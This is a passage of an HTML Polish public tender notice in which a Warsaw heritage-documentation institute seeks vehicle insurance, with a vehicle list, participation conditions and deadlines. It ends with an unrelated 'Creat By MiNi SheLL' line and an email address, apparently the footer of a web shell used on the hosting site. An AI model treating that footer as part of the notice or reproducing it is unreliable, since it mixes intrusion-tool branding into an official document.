VF1ILCAA65V244836,-, 100 000, 31.01.2009r., 31.01.2009r., 15.05.2010r., 2005, fabryczny, Immobilaiser, Warszawa; 6)Citroen C-15, ciężarowy, FZA G947, 1769, 2, 4.100,00 VF7VDPP0013PP0590, 10CV3H4031853, 294 000, 31.01.2009r., 31.01.2009r., 12.12.2009r., 1996, -, Immibilaiser, Łęknica; 7)Polonez FSO, osobowy, PLE 98MP, 2000, 5, 4.500,00, SUPB40CEHYW173570, -, 118 500, 31.01.2009r., 31.01.2009r., 10.12.2009r., 2000, -, -, Trzebiny; 8) Zetor Proxima 6441, ciągnik rol, FZA 94TC, -, 1, 74.400,00, R 644101396H, 7294-001452-00-06,-, 31.01.2009r., 31.01.2009r., 22.12.2009r., 2006,-,-, Łęknica, 9) Ursus 1600 -1224-Z120, ciągnik rol, FZA 93TC,-, 1, 156.200,00, UCC060109, T00191,-,31.01.2009r., 31.01.2009r., 22.12.2009r., 2006, -,-, Łęknica; 10) Pronar MTZ 320A, ciągnik rol ,FZA V063, 1551 ,1 14.300,00, 00582A, 9374,-, 31.01.2009r., 31.01.2009r., 11.05.2009r., 2000,-,-, Łęknica; 11)Ursus C 360, ciągnik rol, FZA V401, 3120, 1, - 612791, 589267,-, 31.01.2009r., -- ,06.04.2009r., 1988, -, -, Łęknica; 12)Pol-Mot Warfama T042, Przyczepa, FZA 24RN, -, -, 23.700,00, 060038,-,-;31.01.2009r., 31.01.2009r., 03.09.2009r., 2006,-,-, Łęknica; 13)Biafamar T-117-I ,przyczepa ,FZA R126,-,-, - ,SXAT 1171PYCB01461, -,- ,31.01.2009r., ---, 09.05.2009r., 2000,-,-, Łęknica; 14)Barwiec D 734, przyczepa, FZA R772 ,-, -, -, 0849, -,-; 31.01.2009r., -, 04.04.2009r., 1990, -,-, Łęknica...</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.51.30.00-9, 66.51.41.10-0, 66.51.60.00-0, 66.51.50.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust 1 Ustawy Prawo Zamówień Publicznych: 1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 2. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia-nie spełnia...</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu: a. Oświadczenie Wykonawcy potwierdzające spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 Ustawy Prawo Zamówień Publicznych wg wzoru stanowiącego załącznik nr 3 do SIWZ. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z podmiotów występujących wspólnie. b. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z podmiotów oferty wspólnej. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt b) składa odpowiednio dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że: 1. nie otwarto jego likwidacji ani nie ogłoszono upadłości Dokumenty o których mowa punkcie 1 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania...</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kobidz.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krajowy Ośrodek Badań i Dokumentacji Zabytków w Warszawie (00-464) przy ul. Szwoleżerów 9 (pokój nr 15)...</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2009 godzina 09:30, miejsce: Oferty winny być złożone w kancelarii Krajowego Ośrodka Badań i Dokumentacji Zabytków mieszczącej się w Warszawie (00-464) przy ul. Szwoleżerów 9 (pokój nr 15)...</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com